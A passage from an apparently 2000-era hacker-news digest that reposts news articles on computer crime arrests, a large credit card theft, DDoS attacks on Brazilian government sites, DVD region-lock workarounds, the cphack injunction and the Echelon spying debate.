a dispute with his employers, according to U.S. Attorney Loretta Lynch. He was arraigned in federal court in Brooklyn yesterday and ordered held without bail, Lynch said. ITTI's software system allows securities firms to trade Nasdaq stocks online, a representative for the company said. It is marketed by other firms, such as Trimark Group, under their own brand names, she said. The system links small broker-dealers with market-makers like Knight/Trimark, Mayer & Schweitzer and others, a Knight/Trimark spokesman said. Firms use it so they don't have to install and maintain direct hardware and software connections to market-makers. Smires' attacks caused "significant interruption of ITTI's trade execution over the past three business days," Lynch said. "If the attacks had continued to cause denial of service, the viability of ITTI would have been threatened, resulting in major disruption of trading on the Nasdaq," she added. The U.S. Secret Service's Electronic Crimes Task Force, which is a cooperative effort of 25 local, state and federal agencies and 45 private companies, helped trace Smires' computer attacks, said Bob Weaver, a Secret Service representative. Conflict developed between Smires and his bosses when ITTI's chief development officer, who had hired Smires and was his supervisor, resigned March 6, according to an affidavit filed in the case by Secret Service Agent Peter Cavicchia. The firm then hired systems consultants to help fill the gap created by the departure, but Smires and another, unidentified programmer refused to help train the newcomers on ITTI's systems, according to the affidavit. Smires and the other programmer then told the firm's executives that they would quit unless they were given "more employment security, a greater salary and a greater equity interest in the firm," Cavicchia said. ITTI responded by offering them one-year employment contracts, raises and stock options, he said. Smires and the other programmer nevertheless decided to resign, according to the affidavit. The pair demanded "$70,000 immediately, 50,000 stock options and more substantial salary increases," Cavicchia said. A "tentative agreement" was reached March 8, Cavicchia said. The next day, Smires and the other programmer backed out of the agreement, demanded more favorable terms and said ITTI executives should call them only if the firm agreed to the specific counter-offer, Cavicchia said. ITTI didn't call. Later on March 9, the attacks on ITTI's system began. The attacks continued Friday, Monday and yesterday, according to the affidavit, shutting down ITTI's computers for a total of about five hours. "While one of the attacks was occurring, ITTI computers revealed the Internet Protocol address of the attacking computer," enabling employees to trace it to a building on the Queens College campus in Flushing, New York, where Smires is an instructor, Cavicchia said. Secret Service agents were told that the particular Queens College computer from which the attack was launched was being used by Smires at the time, the affidavit said. After his arrest, Smires admitted that he was responsible for the March 13 and March 14 attacks, Cavicchia said. Smires also waged some of his attacks from a Kinko's copy shop in Manhattan, Lynch said. Copyright 2000, Bloomberg L.P. All rights reserved. -=- Assoc.Press; 404 @HWA 35.0 HNN:Mar 16th:PlayStation2 can Play US DVD ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by acopalyse Some DVDs released for the North American Region can be played on PlayStation2 consoles in England. While pressing buttons in a certain sequence while the PlayStation2 boots up into DVD mode can sometimes allow Region 1 CDs to be played on the Region 2 device. (Wonder if this will have any effect on the DeCSS lawsuit?) The Register UK http://www.theregister.co.uk/000315-000017.html Gaming Intelligence Agency http://www.thegia.com/news/0003/n11a.html Register; Posted 15/03/2000 5:04pm by Linda Harrison PlayStation 2 can play US DVDs - apparently Gaming boffins claim to have found a way to play American DVDs on PlayStation 2 consoles. Three codes have surfaced which make it possible to play Region 1 (North America) DVDs on the PlayStation 2 -- a Region 2 (Europe, Japan and Asia) DVD player. Like console video games, DVDs are usually fixed by vendors so they can only operate within specific world markets. It was previously believed the PlayStation 2, launched solely in Japan, could play only Region 2 DVDs. But the Gaming Intelligence Agency's Web site this week claimed to have found the codes needed to overcome this inconvenience. These codes do not work every time -- a hitch believed to be linked to how hard the Dual Shock 2' buttons are pressed. "All three codes should be entered when the PlayStation 2 DVD bootup sequence begins fading to black... If you get a region failed message, don't despair; just try again. The same disc will work some times and not others," it reports. "While these codes certainly leave room for improvement, the advent of any region bypass is good news for system importers and DVD fans," thegia.com adds. Sony Computer Entertainment in the UK chose not to comment.® -=- GIA; Play American DVDs on Japanese PlayStation 2 [03.11.00] » Simple controller codes make it possible. Two simple controller codes have recently surfaced that make it possible to play Region 1 (North America) DVDs on the PlayStation 2, a Region 2 (Japan and Asia) DVD player. Much like console videogames, DVDs are region encoded to dissuade consumers from importing titles from outside of the country. It was previously believed that the PlayStation 2 would only play Region 2 DVDs. These codes currently only work with about partial frequency. We are currently unsure why they do not work 100% of the time; we believe they may be dependent on how hard the user presses the Dual Shock 2's analog buttons. If you own a PS2 and Region 1 movies, the GIA is interested in hearing about your experiences with the code, especially if you find a way to make Region 1 movies play with greater frequency. Please e-mail staff@thegia.com with the movie tested, code used, and the tries / success ratio. All three codes should be entered when the PlayStation 2 DVD bootup sequence begins fading to black. The buttons should be held until either the DVD movie starts up (1 line of Japanese) or a "region failed" message appears (2 lines of Japanese). If you get a region failed message, don't despair; just try again. The same disc will work some times and not others. The first code comes from the GIA's own J.T. Kauffman; it is apparently circulating Japanese message boards and web sites. The code is: hold down L1, Circle, and Select. This code has worked with both the Dual Shock 1 and 2 with about 40% accuracy. The second code comes from a friend of the GIA known as Barubary. The code is: press in L3 (the left analog stick) straight and hard. This code does not work with the Dual Shock 1, but works with the Dual Shock 2 with about 60% accuracy. The newest, third code comes from GIA friend Nick "Rox" Des Barres. Nick reports that this code works an astounding 95% of the time. The instructions follow: Insert a first-generation PlayStation pad (i.e., not an analog controller) in Control Port 1 of the PS2. Insert DVD Hold UP on the pad until the DVD menu appears Highlight the play icon and select it. Nick adds, "I tried this on 20 or so DVDs, and it booted all of them. Two or three would not play. You could access the menus, however. It should be noted I was using a Japanese first-generation PS1 pad, though I can't imagine why it wouldn't work with American ones." While these codes certainly leave room for improvement, the advent of any region bypass is good news for system importers and DVD fans. The GIA will keep you posted on any new developments on the PS2 DVD front. @HWA 36.0 HNN:Mar 16th:ISTF Releases Security Recommendations ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Chris The Internet Security Task Force, a conglomeration of big name tech companies ISPs and other e-business firms have produced a "vendor neutral set of recommendations in understandable language" about the problems and solutions in internet security. The paper doesn't say anything new, but because it was released by "credible" vendors and not "the evil underground" some suits might finally pay attention. But then again, maybe not. Initial Recommendations For Conducting Secure eBusiness http://www.ca.com/ISTF/recommendations.htm @HWA 37.0 HNN:Mar 17th:485,000 Credit Cards Numbers Stolen, Found on Gov Computer ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench A file containing credit card numbers, expiration dates, names and addresses was found last year on a US government website. The thief has been traced back to a European country but it has not been revelaed which one. It is also not been revealed which online service the numbers came from or which government agency was unwittingly storing the numbers. The incident has been confirmed by the Secret Service but first came to light when a bank employee notified reporters. The bank received the notice of the credit card heist from Visa however failed to notify its card holders. MSNBC http://www.msnbc.com/news/382561.asp Vast online credit card theft revealed Hacker hid data on 485,000 cards on U.S. agency’s Web site By Mike Brunker © MSNBC March 17 — In the largest known case of cybertheft, a computer intruder stole information on more than 485,000 credit cards from an e-commerce site and then secretly stored the massive database on a U.S. government agency’s Web site, MSNBC.com has learned. Credit card companies notified financial institutions, but many of the compromised accounts remain open to this day because the banks neither closed them nor notified customers of the theft. THE HEIST occurred in January 1999, but only a few details have previously been made public. The scope of the crime emerged in a letter dated Dec. 27 from Visa USA to member financial institutions. Jim Macken, a Secret Service spokesman, confirmed that the incident had occurred and added some details in an interview on Thursday. Two arrested in online credit card case The Visa letter, a copy of which was provided to MSNBC by a source in the banking industry, quotes federal authorities as saying that the credit card information — including expiration dates and cardholder names and addresses — was stolen from an Internet retail site by a hacker. It said the store of data on Visa, MasterCard, American Express and Discover cards was discovered on an unspecified government computer system during an audit. The letter did not say when the stolen data was found, but Macken said it was discovered before March 1999 on the Web site of a U.S. government agency, which he declined to identify. .This government Web administrator noticed that a lot of the memory was chewed up for no reason, so he checked and found the file (containing the stolen data),. he said. NO EVIDENCE OF FRAUDULENT USE There was no evidence that any of the cards were used to commit fraud and some of the accounts were not active, Macken added. The letter said that authorities had not identified the thief, but Macken said investigators have since traced the criminal to Eastern Europe. The investigation is ongoing and involves diplomatic contacts with the country in question, he said. The Internet retail site from which the data was stolen has also since been identified, but Macken declined to name it. It was unclear why the thief hacked the government Web site and stored the data there, Macken said, though he allowed that the act might have been the online equivalent of thumbing one’s nose at U.S. authorities. As MSNBC reported last week, U.S. authorities have so far been stymied in their attempts to prosecute credit card thieves and fraud rings based in the former Soviet bloc nations and Asia. Overseas fraud artists are untouchable Secret Service officials testified about some details of the case before Congress early last year to demonstrate the peril that computer hackers pose to online commerce, Macken said. Their comments generated little coverage, however, and the scope of the case is only now becoming clear. EFFORT TO HIGHLIGHT INACTION The copy of the letter from Visa was obtained by MSNBC from an employee at the Navy Federal Credit Union, in Merrifield, Va., the world’s largest credit union with 19 million members. The letter was provided, the source said, to highlight the fact that some financial institutions are failing to act to protect consumers when there is evidence that their credit card information has been stolen. Officials at the credit union took no action to warn customers whose account numbers were among those stolen by the hacker, said the source, who spoke on condition of anonymity. Instead, they ordered a .spot check. of 50 to 100 accounts and then decided that no further action was necessary, the source said. The source said the same procedure was followed two weeks later, when Visa alerted the institution of the theft of data on 300,000 credit cards from the CD Universe Web site — the biggest theft of credit card data over the Internet that previously had been made public. .It was decided that ... it would be too much of an inconvenience and too costly to shut down the accounts and issue new numbers,. said the source. .It was deemed not the credit union’s responsibility.. The credit union source said that fraudulent charges have subsequently appeared on some of the accounts that were compromised, though it is impossible to definitively link the fraud to the theft. CREDIT UNION RESPONDS In a statement issued Friday in response to MSNBC.com’s story, Navy Federal Credit Union officials did not challenge the assertion that they did not warn customers of the theft. But they denied that cost or inconvenience were factors in the decision. .When we received notification of this problem from VISA USA, we reviewed our systems and were confident that all appropriate controls were in place to protect our members’ financial welfare,. said Tom Steele, a credit union vice president in charge of the credit card division. .Additional checks of the 1,500 Navy Federal credit card accounts identified by VISA USA confirmed that the steps we had taken safeguarded every cardholder — we have also not seen any increase in fraud losses.. The statement also indicated that no Navy Federal cardholders have been victims of identity theft as a result of the heist. Calls to American Express and a half dozen major banks seeking information on their response when notified of the theft were not returned. Scott Lynch, a spokesman for Visa USA, said he could not comment on the case. Nor would he explain why Visa didn’t notify its members of the theft until December. Alicia Zatkowski, a spokeswoman for Discover Financial Services, said the firm’s fraud investigators were not aware of such a case. Vincent DeLuca, vice president of fraud control at MasterCard International, said, .We are aware of some cases but we’re not at liberty to talk about any ongoing investigations. Several financial institutions ordered the wholesale closure and replacement of cards that were compromised in the CD Universe case, which also remains under investigation. Such across-the-board replacement programs were well publicized in an effort to assure online consumers. Banks and credit card companies often point out that consumers are responsible only for the first $50 of fraudulent online purchases — and that is nearly always waived. But stolen credit card information can be used to commit fraud against unsuspecting Internet merchants, who in most cases bear the cost of the crime, or for identity theft — a practice in which criminals use personal data to obtain new credit, borrow money or make big-ticket purchases. The Treasury Department on Wednesday held a two-day national summit on identity theft to focus attention on what Treasury Secretary Lawrence Summers described as .a growing and major criminal threat.. At the session, victims said that while they did not ultimately have to pay for the losses run up in their names, identity theft is by no means a victimless crime. .It has been sheer hell, and I do mean hell,. said Darlene Zele, a Rhode Island hospital worker who one of the victims who testified about years of struggling to repair the havoc wrought on their credit records. .At this point, after five years, it’s still not over.. Got a tip about the use or abuse of credit cards online? Write to tipoff@msnbc.com. @HWA 38.0 HNN:Mar 17th:Brazil Gov Sites Suffering Under DDoS Attacks ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by webmaster A group called DDoS-BR is spreading denial of service attacks against Brazilian government networks. The Brazilian Supreme Court and the National Telecommunications Agency web sites have been shutdown for most of the week due to the attacks. The Brazilian authorities are looking forward legislation that will soon be approved which might give the federal police enough power to investigate and arrest electronic criminals. (Hopefully they have the knowledge to use that power wisely.) SecureNet - In Spanish correction: Portuguese ... http://www.securenet.com.br/cgi-bin/news?id=15030003 @HWA 39.0 HNN:Mar 17th:Secret Service Harassing Bernie S Again ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by macki Five years to the day after Bernie S. was arrested at gunpoint and subjected to nearly 17 months of imprisonment by the United States Secret Service, agents of the USSS have again begun some kind of cat and mouse game, the nature of which has yet to be revealed. 2600 http://www.2600.com/news/2000/0317.html SECRET SERVICE HARASSING BERNIE S AGAIN 03/17/00 Five years to the day after Bernie S. was arrested at gunpoint and subjected to nearly 17 months of imprisonment by the United States Secret Service, agents of the USSS have again begun some kind of cat and mouse game, the nature of which has yet to be revealed. A Special Agent from the Secret Service showed up unannounced at Bernie's workplace and told his employer they wanted to question Bernie, who happened to be out sick that day. When Bernie returned to work the following day and discovered the Secret Service wanted to talk to him, he surprised the agent by calling him. What followed was an extremely strange and circular conversation. At first the SS agent wouldn't talk to him at all. Then he called Bernie back and said they needed to talk with him at his home at 7am the next morning. When Bernie explained he was just getting over a serious illness and that this was an unreasonable hour, the agent suggested 6am. Bernie repeatedly offered to answer their questions at several neutral locations, but they said any place other than his home was unacceptable. Bernie told them he had nothing to hide, but that he was not comfortable having Secret Service agents poking around inside his house and that they would have to get a warrant before he'd let them in. The agent then said he had to go and would talk to him later. About ten minutes later, a second, more polished, SS agent called Bernie and continued trying to persuade him to let them inside his home. The agent tried to goad Bernie by implying he must have something to hide, and that if he didn't then there was no reason why they shouldn't be allowed inside his home. At this point, Bernie tried to explain by saying if you asked 100 people on the street if they'd want federal agents in their living room and bedroom, almost everyone would say no and that he was no exception. The SS agent disagreed, saying people have no legitimate fears about such a visit. Bernie repeatedly tried to get the SS agents to tell him what they wanted. Finally, the second agent said, "I need to check to see if your telephone and Cable TV wiring is hooked up properly." This preposterous claim made Bernie actually laugh out loud. But as a further gesture of cooperation, Bernie offered to allow Bell Atlantic and Comcast Cable TV technicians to inspect his house wiring for them. The SS agents said that, too, would be unacceptable. It became clear the SS agents were simply trying anything they could to get a foot in his door. Needless to say, after Bernie's previous horrendous experience with the Secret Service, their feet are not welcome in his home. He then gave them his attorney's name and telephone number and told them to address future inquiries directly to his lawyer. So what is this all about? We don't know yet, but clearly something is up. And the way the Secret Service has played sick games with people's lives in the past, we felt it would be wise to alert everyone now so we can all keep a closer eye on them before they try any further outrageous actions under the veil of secrecy. @HWA 40.0 HNN:Mar 17th: Secret Service to Work with Citicorp to Fight Fraud ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench The U.S. Secret Service and Citicorp, a unit of New York-based Citigroup Inc., are working together to develop a pilot program to fight identity theft and other types of e-commerce fraud. The program will devise a strategy to identify suspicious e-commerce activities, including forged identities and other schemes used to commit bank and credit fraud. Computer World http://www.computerworld.com/home/print.nsf/all/000316C9BE US Treasury Dept. - Press Release http://www.ustreas.gov/press/releases/ps465.htm Computer World; Secret Service, Citicorp team to fight e-commerce fraud U.S. Treasury Department announces new initiatives to combat identity, other types of e-commerce fraud By Linda Rosencrance 03/16/2000 The U.S. Secret Service and Citicorp, a unit of New York-based Citigroup Inc., are working together to develop a pilot program to fight identity theft and other types of e-commerce fraud, according to a statement issued by the U.S. Treasury Department. The announcement was made at the two-day National Summit on Identity Theft convened by Treasury Secretary Lawrence H. Summers yesterday. The summit includes more than 150 participants from federal, state and local government agencies; financial institutions; credit-card companies and reporting agencies; as well as identity theft victims and consumer advocacy groups. "Criminals are exploiting new technologies to make a significant profit from an old crime," Summers said in the statement. "We will continue to work with the private sector to strengthen our efforts to combat this threat." The program being developed by the Secret Service and Citicorp will devise a strategy to identify suspicious e-commerce activities, including forged identities and other schemes used to commit bank and credit fraud. At yesterday's summit, Summers also said that the Secret Service is developing a computer-based training program to help law enforcement officials handle financial crimes. -=- Press Release; TREASURY NEWS FROM THE OFFICE OF PUBLIC AFFAIRS FOR IMMEDIATE RELEASE March 15, 2000 LS-465 TREASURY CONVENES IDENTITY THEFT SUMMIT Treasury Secretary Lawrence H. Summers convened a two-day National Summit on Identity Theft today and announced four new initiatives targeted at cracking down on the increasing threat of identity theft. Criminals are exploiting new technologies to make a significant profit from an old crime," said Treasury Secretary Summers. "We will continue to work with the private sector to strengthen our efforts to combat this threat." Called for last year by President Clinton, the Summit will address the prevention of identity theft, remediation and enforcement efforts with the public and private sector. The Summit will consist of a series of panels and more than 150 participants from federal, state and local government agencies, financial institutions, credit card companies and reporting agencies, as well as identity theft victims, consumer advocacy groups and private sector representatives. The four new Treasury initiatives to help combat identity theft include: Skimming and counterfeit check databases currently used to identify common suspects, defendants of identity theft, and address criminal trends prevalent in financial crimes today. These databases were developed and are maintained by the U.S. Secret Service in partnership with the financial industry; A computer-based training module developed by the U.S. Secret Service that will focus on financial crimes and all pertinent statutes including identity theft, and be made available within the agency as well as local and state law enforcement officials throughout the U.S.; A pilot program, developed by the U.S. Secret Service and Citicorp, to help identify suspicious activity on electronic commerce. The program will attempt to develop a protocol for the identification of identity theft and other schemes used to commit bank fraud, credit fraud and money laundering within electronic commerce and the immediate notification of law enforcement authorities; and Forums and mini-conferences to maintain a dialogue between the private and public sector. Treasury's National Summit on Identity Theft is the first national level conference involving law enforcement, victims, industry and nonprofits interested in the issue. @HWA 41.0 HNN:Mar 17th:Computer History Lecture Series ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by McIntyre The Computer Museum History Center, a non-profit entity dedicated to the preservation and celebration of computing history, will be having a lecture series entitled "Early Computer Crime". Speakers include Whitfield Diffie, John Markoff, Peter Neumann and Cliff Stoll. The Lecture will be held on Thursday, March 23, 2000 at NASA Ames Research Center Auditorium, Moffett Field, Mountain View, CA. It is requested that RSVPs be received by Monday March 20. (Sounds like fun. I would like to cheer some the speakers and heckle others.) The Computer Museum http://www.computerhistory.org/events/earlycrime_03232000/ @HWA 42.0 HNN:Mar 17th: Australian Police To Increase Online Presence ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by William Knowles Australian Federal Police Commissioner Mick Palmer said that in an effort to get better training for the people they already have and in an effort to attract more qualified applicants the Police will conduct a staff exchange with private industry. The commissioner will also establish an Electronic Crime Steering Committee to evaluate Australia's capacity to fight electronic crime and will develop an Australian Law Enforcement Electronic Crime Strategy by mid summer. The Age http://www.theage.com.au/breaking/0003/17/A15120-2000Mar17.shtml Police to step up fight against e-crime Source: AAP | Published: Friday March 17, 3:38 PM Police are set to recruit computer boffins in a bid to boost the fight against so-called e-crime. The potential to commit crimes using computers and other information technology was one of the greatest problems ever to face law enforcement, Australian Federal Police Commissioner Mick Palmer said today. Speaking at the end of a week-long conference of police commissioners from Australia, New Zealand, Fiji and Papua New Guinea, Commissioner Palmer said a staggering 900 million people would be using the Internet by the end of this year. 'People who abuse these technologies have the capacity to commit offences on a global basis, with complete anonymity, with speed and on a scale not previously encountered,' Commissioner Palmer told journalists. Credit card fraud, electronic vandalism, terrorism, electronic money laundering and tax evasion are some examples of electronic crime. 'The capacity of properly organised, electronic based crime to undermine the financial stability of small and medium sized countries is very real,' Commissioner Palmer said. A major problem for police is how to attract personnel with enough technical expertise to fight this new crime. Commissioner Palmer said already police recruitment and selection was becoming more flexible. 'Clearly some of the technical skills that we are going to need ... come at a very high cost,' he said. 'People ... in that industry are earning a lot of money and that makes the partnerships with business and the wider business community very important.' Police will be looking to exchange staff with private industry to gain the skills necessary, probably on short term, project based arrangements. Commissioner Palmer said discussions and negotiations had already begun on this issue and Commonwealth Bank CEO David Murray addressed the commissioners. 'We will be recruiting people from the coalface for short periods of time, we are going to be sharing resources between ourselves and the wider partnership both in the private and public sense.' The commissioners agreed to establish an Electronic Crime Steering Committee to evaluate Australasia's capacity to fight electronic crime. It will develop an Australasian Law Enforcement Electronic Crime Strategy by the end of June. @HWA 43.0 HNN:Mar 17th:Apex DVD Defeats Region and Macrovision ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Sciri Hot on the trail of the PlayStation2 being able to play Region 1 discs is the Apex AD-600A, a DVD/VCD/CD/MP3 player that can disable CSS, Region and Macrovision settings after entering a simple code (Preferences -> Step -> Prev Track -> Next Track). Review of the Apex-600A http://uberauk.epinions.com/elec-review-10C9-40ABFE-388DCD5F-bd3 Nerd Out http://www.nerd-out.com/ @HWA 44.0 HNN:Mar 20th:First Malicious Code Direct at WebTV ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Hal0 Microsoft is working on a patch of its service to counteract malicious programming code that overloads WebTV newsgroup discussions with fake postings. While the malicious code self replicates like a virus Microsoft insists on calling it malicious code. The code appends itself to a WebTV users signature file and then cross posts itself to numerous newsgroups. Wired http://www.wired.com/news/technology/0,1282,35045,00.html WebTV's 'Non-Virus' Virus by Chris Oakes 3:00 a.m. Mar. 18, 2000 PST Although it prefers to call the trouble a "malicious code," WebTV has experienced its first virus. Parent company Microsoft is working on a patch of its service to counteract malicious programming code that overloads WebTV newsgroup discussions with fake postings. "Newsgroups are starting to flood with junk posts, and you can't post," said Brian Bock, editor-in-chief of Net4TV Voice, an online publication focusing on Internet services via television. WebTV users first reported the problem to Net4TV. Bock said the virus -- a first for the closed, non-PC WebTV system -- is like the renowned PC virus Melissa. The similarity is that it self-replicates, he said. But this virus does it by altering signatures that appear at the bottom of WebTV user's Usenet messages. "When another WebTV user runs across [an infected message], it writes the virus into their email signature," he said. "Then when they go make a Usenet posting, it cross-posts. They end up posting to a whole bunch of different news groups." The result is the multiplication of junk messages in discussion forums until discussions are disrupted completely because the system's maximum number of viewable messages is reached. Microsoft was extremely reluctant to call the problem a virus. "It's not a virus," said Microsoft spokeswoman Claire Haggard. "There's never been a virus on WebTV." Then what is it? Haggard said the problem was malicious code in WebTV's Usenet posting system. The company took issue with the description of the code as "self-replicating," saying it had to be "manually" inserted in Usenet posts and didn't self-replicate. Furthermore, Haggard said the multiplying Usenet messages did not involve the exploitation of a user's signature. Bock said the virus does make use of an existing flaw in the service's email system. That hole is exploited along with a WebTV code for posting messages, Bock said. The issues are separate, Haggard said. In any case, the problem gets awfully close to meeting the conventional definition of virus: a malicious code that, once installed, performs usually undesirable tasks on the victim's computer. In most technical definitions, self-replication is not a prerequisite, although the Merriam-Webster definition of virus does include self-replication: "A computer program usually hidden within another seemingly innocuous program that produces copies of itself." Virus or not, manual or self-replicating, the malicious code will be patched, hopefully by next week, the company said. Meanwhile, WebTV will be removing the junk posts. Haggard said the company has only heard from 14 users inquiring about the problem. She said the company plans a regular update of its client and server software soon, and that "the upgrade will be made immune from such hacker problems." @HWA 45.0 HNN:Mar 20th:Liberia Claims Attack In CyberWar ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Evil Wench President Charles Taylor of Liberia has claimed that his country is under attack in a cyber war but failed to say by whom. He made the statement after his government shut down two independent radio stations and their related web sites. Amnesty International and the US State Department have vigorously protested the station closings. Wired http://www.wired.com/news/politics/0,1283,35016,00.html 'Cyber War' in Liberia Reuters 7:00 a.m. Mar. 17, 2000 PST MONROVIA -- President Charles Taylor of Liberia, reacting to criticism of the government's closure of two radio stations, said a "cyber war" had been declared on his country. "A cyber war has been declared on Liberia and the government is doing everything possible to fight back," he said on Thursday at his Executive Mansion after signing into law seven bills. He did not say who was waging this war. Star, an independent radio station that was closed down on Wednesday, had an Internet news service popular with Liberians abroad that was also closed. The government justified the closures by saying that "agents provocateurs" were using the news media, especially radio stations, to create security problems. "The government took the action to prevent an outbreak of another war which could be caused by negative broadcasts to create hatred among the Liberian people through hate messages," Taylor said. Taylor's election in 1997 formally ended a civil war that he started in December 1989. The U.S. government joined human rights groups, local media, and the Press Union of Liberia in protesting against the closures. "The United States vigorously protests the unwarranted closure of these two radio stations and calls on the Government of Liberia to reopen them immediately, without conditions, and to return the confiscated equipment," the U.S. State Department said in a statement. Rights group Amnesty International has linked the closure of Star to a March 13 broadcast it made about a U.S. State Department report on human rights in Liberia. Star was established in 1997 by the Hirondelle Foundation, a Swiss-based non-governmental organization, with the help of the United States Agency for International Development. The second station, Radio Veritas, is run by the Roman Catholic Church. The government suspended the station but said it could start operating again if it provided a written assurance it would broadcast only religious material. The Catholic Archbishop of Monrovia said Veritas had a constitutional right to broadcast. "It is our constitutional right to disseminate information to the public and if we abuse the right, let the courts deal with us, not the executive," Archbishop Michael Kpakala Francis said in a statement released late on Thursday. "We will not give any commitment to the government of Liberia that will restrict us to religious programs," he added, denying that Veritas' license restricted it to religious broadcasts. @HWA 46.0 HNN:Mar 20th:Judge Bans Anti-Filter Software ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Aj U.S. District Judge Edward F. Harrington has granted an injunction requested by Microsystems Software Inc. to prevent distribution of cphack. Cphack was designed to bypass the surfing restrictions used by CyberPatrol as well as list every web site blocked by the software. The Judges decision effectively blocks anyone from distributing the software. There were no defendants present at the hearing, the next hearing is scheduled for March 27th. (This could be a rather serious threat to peoples' right to reverse engineer and to even write software.) MSNBC http://www.msnbc.com/news/383603.asp Associated Press - via Washington Post http://www.washingtonpost.com/wp-srv/aponline/20000317/aponline133352_000.htm Porn Software Injunction Issued By Martin Finucane Associated Press Writer Friday, March 17, 2000; 1:33 p.m. EST BOSTON –– A federal judge Friday ordered a halt to the distribution of a computer program that allows children to bypass software designed to keep them away from Internet pornography. Microsystems Software Inc. of Framingham, which sells the widely used "Cyber Patrol" filtering software, sued two computer experts who distributed the bypassing software via the Internet. The software, called "cphack," also discloses a list of sites that are blocked by the Cyber Patrol program. U.S. District Judge Edward F. Harrington ordered Matthew Skala, a self-described cryptography buff who attends the University of Victoria in British Columbia, and Eddy L.O. Jansson, believed to be living in Sweden, to stop spreading the "cphack" program. The judge also blocked distribution of the "cphack" software by anyone working with them. Microsystems attorney Irwin Schwartz said the judge's order extended to any "mirror" Web sites, where the program may have been copied and made available. Another hearing is set for March 27 on the case. Skala and Jansson were not represented at Friday's hearing, and they did not immediately return e-mails seeking comment. Microsystems has said in its legal filings it would suffer "irreparable harm" from the publication of the bypassing software, which it said sought to destroy the market for its product by rendering it ineffective. "The practical effect is that ... children may bypass their parents' efforts to screen out inappropriate materials on the Internet," according to the filing made this week. Free speech advocates criticized the company's move to block distribution of the software. Peter Junger, a law professor at Case Western Reserve University in Cleveland and an advocate of free speech on the Internet, said it "looks like a rather horrifying challenge to people's right to write software" and to "reverse-engineer" software, which means figure out how it works. "The idea that one can prevent reverse-engineering of software and publishing the results of that reverse-engineering strikes me as a very dangerous restriction on free speech," he said before the judge's ruling. Chris Hansen, a senior lawyer with the national office of the American Civil Liberties Union, said there might be debate about whether distributing the bypass software was legal, but that the ACLU agreed with at least one role of the software – publicizing the list of blocked sites. "Parents who want to install these products ought to be able to do so," he said, adding, "How can you, as a parent, make an intelligent decision (on filtering software)if the product won't tell you what they're blocking?" © Copyright 2000 The Associated Press @HWA 47.0 HNN:Mar 20th:We Spy To Prevent Bribes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond A former Director of Central Intelligence, R. James Woolsey, has written a story about why the United States spies on its allies. The primary reason given is to prevent bribery so that US companies can compete on an even playing field. (Sorry but I don't buy it, that is too much power for such a simple purpose but I guess the ends justify the means for the US Government. So why can't US citizens spy on their own government to make sure they are complying with the law? Where are the checks and balances?) Wall Street Journal - via Cryptome http://cryptome.org/echelon-cia2.htm 17 March 2000. Thanks to DB. We look forward to seeing and hearing James Woolsey and Duncan Campbell openly debate this controversy, in Congressional hearings, on global TV, the Internet, MilNet and IntelNet -- and all the Echelon surveillance stations based in countries of those who "can't compete with the US." See transcript of Woolsey's March 7 remarks on economic espionage to the Foreign Press Center: http://cryptome.org/echelon-cia.htm The Wall Street Journal, March 17, 2000 Why We Spy on Our Allies By R. James Woolsey, a Washington lawyer and a former Director of Central Intelligence. What is the recent flap regarding Echelon and U.S. spying on European industries all about? We'll begin with some candor from the American side. Yes, my continental European friends, we have spied on you. And it's true that we use computers to sort through data by using keywords. Have you stopped to ask yourselves what we're looking for? The European Parliament's recent report on Echelon, written by British journalist Duncan Campbell, has sparked angry accusations from continental Europe that U.S. intelligence is stealing advanced technology from European companies so that we can -- get this -- give it to American companies and help them compete. My European friends, get real. True, in a handful of areas European technology surpasses American, but, to say this as gently as I can, the number of such areas is very, very, very small. Most European technology just isn't worth our stealing. Why, then, have we spied on you? The answer is quite apparent from the Campbell report -- in the discussion of the only two cases in which European companies have allegedly been targets of American secret intelligence collection. Of Thomson-CSF, the report says: "The company was alleged to have bribed members of the Brazilian government selection panel." Of Airbus, it says that we found that "Airbus agents were offering bribes to a Saudi official." These facts are inevitably left out of European press reports. That's right, my continental friends, we have spied on you because you bribe. Your companies' products are often more costly, less technically advanced or both, than your American competitors'. As a result you bribe a lot. So complicit are your governments that in several European countries bribes still are tax-deductible. When we have caught you at it, you might be interested, we haven't said a word to the U.S. companies in the competition. Instead we go to the government you're bribing and tell its officials that we don't take kindly to such corruption. They often respond by giving the most meritorious bid (sometimes American, sometimes not) all or part of the contract. This upsets you, and sometimes creates recriminations between your bribers and the other country's bribees, and this occasionally becomes a public scandal. We love it. Why do you bribe? It's not because your companies are inherently more corrupt. Nor is it because you are inherently less talented at technology. It is because your economic patron saint is still Jean Baptiste Colbert, whereas ours is Adam Smith. In spite of a few recent reforms, your governments largely still dominate your economies, so you have much greater difficulty than we in innovating, encouraging labor mobility, reducing costs, attracting capital to fast-moving young businesses and adapting quickly to changing economic circumstances. 